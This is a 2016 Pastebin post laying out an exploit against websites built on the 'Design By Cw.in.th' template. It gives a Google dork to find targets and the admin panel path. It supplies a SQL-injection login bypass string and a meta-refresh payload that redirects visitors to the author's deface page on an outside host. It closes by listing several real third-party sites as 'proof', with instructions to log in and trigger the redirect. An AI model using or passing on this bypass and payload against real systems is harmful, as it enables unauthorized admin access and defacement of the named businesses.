API tools faq
paste
Advertisement
LelouchViBritannia

Design By Cw.in.th Admin Page Bypass Leading to XSS ATTACKS

LelouchViBritannia
Jun 1st, 2016
556
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.42 KB | None | 0 0
raw download clone embed print report
  1. Design By Cw.in.th Admin Page Bypass Leading to XSS ATTACKS on Victim Website
  2. ###########################################
  3. ~Special Thanks Ashiyane Digital Security Team.! ^
  4. ~Exploit Title : Design By Cw.in.th Admin Page Bypass Leading to XSS ATTACKS on Victim website
  5. ~Exploit Author: Lelouch Baklita
  6. ~Date : June 2 2016
  7. ~Tested on Live sites: See them on 3. Proof
  8. # Vendor Homepage : http://cw.in.th/
  9. # Google Dork : intext:"Design By Cw.in.th"
  10. ~Contact:lordzero2222@gmail.com
  11. ~facebook.com/MagdaloCyberArmy/
  12. ~facebook.com/www.globalsec.hacks.ph/
  13. #########################################^
  14. So i'll use their exploit as an reference to this exploit.
  15. You can see it Here -> https://cxsecurity.com/issue/WLB-2016060006
  16. so now lets start.
  17. ######################
  18. # Exploit Title : Design By Cw.in.th Admin Page Bypass
  19. # Exploit Author : Ashiyane Digital Security Team
  20. # Vendor Homepage : http://cw.in.th/
  21. # Google Dork : intext:"Design By Cw.in.th"
  22. # Date: 2016 05 31
  23. # Tested On : Kali
  24. # Contact:n3t.hacker@gmail.com
  25. ######################
  26. # Describe : Search Dork And Select Target . Now Input webpanel/index.php After Url Such As:
  27. #
  28. # http://site.com/webpanel/index.php
  29. #
  30. # Enter Username and Password : '=' 'OR'
  31. #
  32. # ชื่อเข้าใช้งาน : '=' 'OR'
  33. # รหัสผ่าน : '=' 'OR'
  34. So lets get the job started.
  35.  
  36. 0.i supposed you have some sites now but i guarantee most of them was RAPED
  37.  
  38. 1.
  39. After logging in if you see any form boxes.... if you cant see any then search :b there is an language thing problem you can use google translate if you cant understand what it says.
  40.  
  41. 2. use the code below
  42. <meta http-equiv="refresh" content="1;URL=http://mammothcar.net/calebpogi.html"></span> <--- this will redirect to the desired url.
  43. 3.
  44. http://mammothcar.net/calebpogi.html on this situation the html on mammothcar.net thats my deface page,but on your own you will change it on your own Deface Page Link. but you can try other method as well
  45. 4.
  46. Proof :
  47. http://premierlighting.co.th/webpanel/index.php <-- Log in there using '=' 'OR' then it will redirect :b
  48. http://www.aurora-works.com/
  49. http://www.tokyogemlab.co.th/newsevents.php
  50. http://www.artiste-model.com/webpanel/ <-- Log in there using '=' 'OR' then it will redirect :b
  51. http://www.hicoff.com/webpanel/ <-- Log in there using '=' 'OR' then it will redirect :b
  52.  
  53. Thanks for reading! Mabuhay!
  54.  
  55. Update: Still waiting for the vendor's to response :v
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!